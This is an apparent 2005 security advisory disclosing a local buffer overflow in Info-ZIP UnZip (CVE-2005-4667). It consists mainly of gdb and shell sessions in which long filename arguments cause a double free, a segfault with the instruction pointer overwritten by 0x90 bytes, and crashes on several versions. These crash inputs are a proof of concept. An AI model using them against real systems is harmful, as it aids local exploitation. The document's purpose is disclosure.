14.5

***********************************************************************

$ An open security advisory #14.5 UNZIP Buffer Overflow

***********************************************************************

1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com -+- www.open-security.org

2: Bug Released: December 2005

3: Bug Impact Rate: Undefined

4: Bug Scope Rate: Local

***********************************************************************

$ This advisory and/or proof of concept code must not be used for commercial gain.

***********************************************************************

UNZIP

http://www.info-zip.org/

This bug got a CVE number, which can be found at http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4667

so I thought I might as well add it to the site. It was originally a post to Full-Disclosure as a joke, but I

might as well share it here too :-)

** CAUTION: This us uber lame, n0n-r00t bug. **

*/

Just to add to the pot, this little bug has been there a long time, mmm, around 2+ yrs. Any apps calling

unzip? Any unzip archives with rather large files?

[c0ntexlinuxbox tmp]$ gdb -q unzip

(no debugging symbols found)...Using host libthread_db library

"/lib/tls/libthread_db.so.1".

(gdb) r `perl -e 'print "A" x 5000'`

Starting program: /usr/bin/unzip `perl -e 'print "A" x 5000'`

Reading symbols from shared object read from target memory...(no

debugging symbols found)...done.

Loaded system supplied DSO at 0xffffe000

(no debugging symbols found)...(no debugging symbols found)...unzip:

cannot find or open AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

[snip]

AAAAAAAAAAAAAA.ZIP.

*** glibc detected *** double free or corruption: 0x08075008 ***

Program received signal SIGABRT, Aborted.

0xffffe410 in __kernel_vsyscall ()

(gdb) bt

#0 0xffffe410 in __kernel_vsyscall ()

#1 0x002a2955 in raise () from /lib/tls/libc.so.6

#2 0x002a4319 in abort () from /lib/tls/libc.so.6

#3 0x002dba1b in malloc_printerr () from /lib/tls/libc.so.6

#4 0x002dc4ba in free () from /lib/tls/libc.so.6

#5 0x080543a6 in ?? ()

#6 0x08075008 in ?? ()

#7 0x00000005 in ?? ()

#8 0x00000000 in ?? ()

(gdb) frame 4

#4 0x002dc4ba in free () from /lib/tls/libc.so.6

(gdb) i r

eax 0x0 0

ecx 0x10b7 4279

edx 0x6 6

ebx 0x39dff4 3792884

esp 0xbfdc2194 0xbfdc2194

ebp 0xbfdc21a8 0xbfdc21a8

esi 0x39f800 3799040

edi 0x8075008 134696968

eip 0x2dc4ba 0x2dc4ba

eflags 0x200246 2097734

cs 0x73 115

ss 0x7b 123

ds 0x7b 123

es 0x7b 123

fs 0x0 0

gs 0x33 51

(gdb) x/s $edi

0x8075008: 'A'

(gdb) x/s $esi

0x39f800 : "\001"

(gdb)

0x39f802 : ""

(gdb)

gdb) r `python -c 'print "\x90" * 50000'`

The program being debugged has been started already.

Start it from the beginning? (y or n) y

warning: cannot close "shared object read from target memory": File in

wrong format

Starting program: /usr/bin/unzip `python -c 'print "\x90" * 50000'`

Reading symbols from shared object read from target memory...(no

debugging symbols found)...done.

Loaded system supplied DSO at 0xffffe000

(no debugging symbols found)...(no debugging symbols found)...

Program received signal SIGSEGV, Segmentation fault.

0x90909090 in ?? ()

(gdb)

[c0ntex ~]$ unzip -v | head -1

UnZip 5.32 of 3 November 1997, by Info-ZIP. Maintained by Greg Roelofs. Send

[c0ntex ~]$

[c0ntex ~]$ uname -a

SunOS 5.8 Generic_117350-24 sun4u sparc SUNW,UltraAX-i2

[c0ntex ~]$ unzip `perl -e 'print "A" x 50000'`

Bus Error (core dumped)

[c0ntex ~]$

c0ntexdebauch:~$ unzip -v | head -1

UnZip 5.52 of 28 February 2005, by Info-ZIP. Maintained by C. Spieler. Send

c0ntexdebauch:~$ uname -a

Linux debauch 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux

c0ntexdebauch:~$ unzip `perl -e 'print "A" x 32000'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.ZIP.

error: zipfile probably corrupt (segmentation violation)

c0ntexdebauch:~$

[c0ntexlinuxbox tmp]$ unzip -v | head -1

UnZip 5.51 of 22 May 2004, by Info-ZIP. Maintained by C. Spieler. Send

[c0ntexlinuxbox tmp]$ uname -a

Linux linuxbox 2.6.12 #2 Wed Jul 13 10:19:26 BST 2005 i686 i686 i386 GNU/Linux

[c0ntexlinuxbox tmp]$ unzip `perl -e 'print "A" x 50000'`

Segmentation fault

[c0ntexlinuxbox tmp]$


Ведете ли вы блог?

Да
Нет
Планирую


Результаты опроса

Новостной блок